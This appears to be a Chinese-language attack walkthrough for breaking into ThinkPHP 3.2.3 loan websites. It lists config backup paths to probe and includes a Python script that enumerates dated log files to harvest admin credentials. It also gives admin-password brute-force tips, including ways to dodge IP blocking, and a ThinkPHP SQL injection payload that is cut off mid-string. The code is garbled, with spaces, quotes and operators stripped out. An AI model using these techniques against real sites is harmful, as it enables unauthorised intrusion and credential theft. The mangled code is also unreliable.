关于thinkphp.3.2.3贷款网站检测思路.docxVIP

PAGE1

关于thinkphp.3.2.3贷款网站检测思路

moonsec

关于thinkphp.3.2.3贷款网站检测思路 1

1.分析入口点 1

2.扫描日志文件 2

3.根据报错信息制作备份文件字典 5

4.burpsuite爆破后台密码 5

5.SQL注入利用 6

6.查询mysql密文破解登录phpmyadmin 8

7.Xss漏洞 9

8.flash社工钓鱼 11

分析入口点

如果有源码的情况下可以进行审计或找代码审计人员分析挖掘漏洞。

看到定义目录是My

检测数据库文件这些配置文件如果用一些编辑器会留下临时文件或者文件可能会进行备份

My\Common\Conf\config.php

My\Common\Conf\config.php.bak

My\Common\Conf\config.php~

My\Common\Conf\config.php.swp

My\Common\Conf\config.php.old

定义目录/项目名/config.php

访问或者扫描这些文件是否存在备份文件

My\Home\Conf/config.php

My\Home\Conf/config.php~

My\Home\Conf/config.php.bak

My\Home\Conf/config.php.swp

My\Home\Conf/config.php.rar

My\Home\Conf/config.tar.gz

扫描日志文件

项目文件\Runtime\Logs\Home

这个源码的项目文件是My

My\Runtime\Logs\Home

Thinkphp3.1.2格式是年份_0月_0日.log

日志扫描工具

#coding:utf-8

importrequests

url=7:81/My/Runtime/Logs/Home

defadd_urls(patch,y):

urls=[]

foriinrange(1,13):

forjinrange(1,32):

ifi10:

ifj10:

urls.append(patch+/%s_0%s_0%s.log%(y,i,j))

else:

urls.append(patch+/%s_0%s_%s.log%(y,i,j))

else:

ifj10:

urls.append(patch+/%s_%s_0%s.log%(y,i,j))

else:

urls.append(patch+/%s_%s_%s.log%(y,i,j))

returnurls

urls=add_urls(url,20)

foriinurls:

req=requests.get(i)

ifreq.status_code==200:

print(i)

html=req.text

withopen(webhack123.txt,a,encoding=utf-8)asf:

f.write(html)

打开日志查看Log里面可能会记录管理员的账号和密码

根据报错信息制作备份文件字典

根据报错信息得到thinkphp3.2.3版本网站路径

C:\www\WWW\

如果存在备份文件一般是

.rar

.zip

.rar

.tar.gz

da1.tar

da1.zip

da1.tar.gz

www.tar.gz

www.zip

www.rar

最好写个字典自动生成器然后批量扫描。

burpsuite爆破后台密码

如果找到后台的情况下对方又没开启验证码的情况下看情况选择密码字典穷举

7:81/Log/login.html

选择合适的字典进行穷举如果是阿里云ip请使用阿里云vps进行爆破如果不是请把线程地址最慢不然ip会被拦截

根据长度检测出正确的密码。

SQL注入利用

在thinkphp3.2.3存在通杀注入漏洞

HTML可以转换成这个这种模式

7:81/loan/read/?id=19

Payload

id[where]=3and1=updatexml(1,concat(0x7,(selectpasswordfromuserl